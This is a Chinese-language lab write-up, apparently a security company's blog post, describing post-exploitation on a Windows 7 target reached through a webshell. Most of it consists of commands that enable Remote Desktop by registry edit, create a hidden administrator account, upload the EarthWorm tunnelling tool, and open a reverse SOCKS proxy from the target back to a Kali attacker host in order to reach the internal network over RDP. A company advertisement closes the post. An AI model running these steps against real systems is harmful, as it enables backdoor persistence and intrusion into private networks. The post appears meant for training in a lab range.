实验环境:
靶场:Windows 7 ip 192.168.100.50
靶场测试过程:
上回已经获取到webshell接下来拿到web服务器权限
1.查看端口开放情况是否具有可以利用的端口
命令:netstat –ano
发现没有可以让我们利用的端口
2. 所以我们主动开启 3389 端口
命令:
REG ADD HKLMSYSTEMCurrentControlSetControlTerminal" "Server /v fDenyTSConnectio ns /t REG_DWORD /d 0 /f
netstat –ano 查看 3389 是否成功开启界面显示 3389 成功开启
3.创建一个隐藏的用户作为远程桌面登陆的用户
命令:net user hk$ 123.com /add
net localgroup administrtors hk$ /add net user hk$
创建一个 hk 的隐藏用户密码为 123.com 将 hk$这个隐藏用户移入到超级管理组查看 hk$用户是否成功创建
4.使用虚拟终端查看 web 服务器真实IP 地址命令:ipconfig
5.使用 kali 尝试远程桌面连接
命令:rdesktop 192.168.100.150
结果无法连接 可能使防火墙进行了端口拦截
6.尝试利用蚁剑对web 服务器进行端口转发或者代理转发
注意:一定要先在攻击机上监听端口然后在使用靶机的 shell 去反弹端口
a.因为考虑到需要对内网进行端口扫描所以本人采用代理转发
b.并且 web 服务器只对外发布了 80 端口所以使用反向代理
c.利用蚁剑上传 ew 软件到 web 服务器的可读可写可执行的文件夹内我采用 temp 目录
路径:C:/windows/temp
7.先在 kali 上监听一个本机的端口的比如 8888
命令:cd ew 进入的 ew 软件的目录
ls显示当前目录下的所有文件
ls –l 查看文件有没有执行权限 如果没有可以使用 chmond 777 * 在添加权限
./ew_for_linux64 -s rcsocks-l 1080 -e 8888 执行监听程序监听本机的 8888 端口并且将结果转到本机的 1080 端口
8.虚拟终端执行 ew 软件将代理反弹到kali 当中
命令:cd../../.. 因为当前在 php 的路径下所以需要退到 C 盘的路径cd windows/temp 切换的 windows/temp 目录
dir 列出当前目录下的所有文件
命令:ew_for_Win.exe -s rssocks -d 192.168.100.143 -e 8888
空显示就证明执行成功
9.配置 kali 中的 proxychains 文件后尝试远程连接路径:/etc/proxychains.conf
命令:vim /etc/proxychains.conf
使用socks5 的协议 监听本机的 1080 端口
命令:proxychains rdesktop 172.16.1.10
使用代理远程连接 web 服务器的真实IP 地址
明天接着更!!
关于我们:
北京路劲科技有限公司(Beijing Lujin Technology Co. , Ltd.)成立于2019年1月4日,是一家提供全面系统集成与信息安全解决方案的专业IT技术服务公司。公司秉承“为网络安全保驾护航”的企业愿景及“提升国家整体安全”的使命,依据风险评估模型和等级保护标准,采用大数据等技术手段,开展网络安全相关业务。公司致力于为各个行业的业务信息化提供软件和通用解决方案、系统架构,系统管理和数据安全服务、以及IT咨询规划、系统集成与系统服务等专业化服务。公司立足北京,走向全国,始终坚持“换位、细节、感恩”的核心价值观,以“共赢、共享、共成长”的经营理念为出发点,集合了一批敢于创新、充满活力、热衷于为IT行业服务的优秀人才,致力于成为您身边的网络安全专家。
关注路劲科技,关注网络安全!
公司:北京路劲科技有限公司
地址:北京市昌平区南邵镇双营西路78号院2号楼5层504
本文始发于微信公众号(LSCteam):Yxcms靶场 | 拿到web服务器权限
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论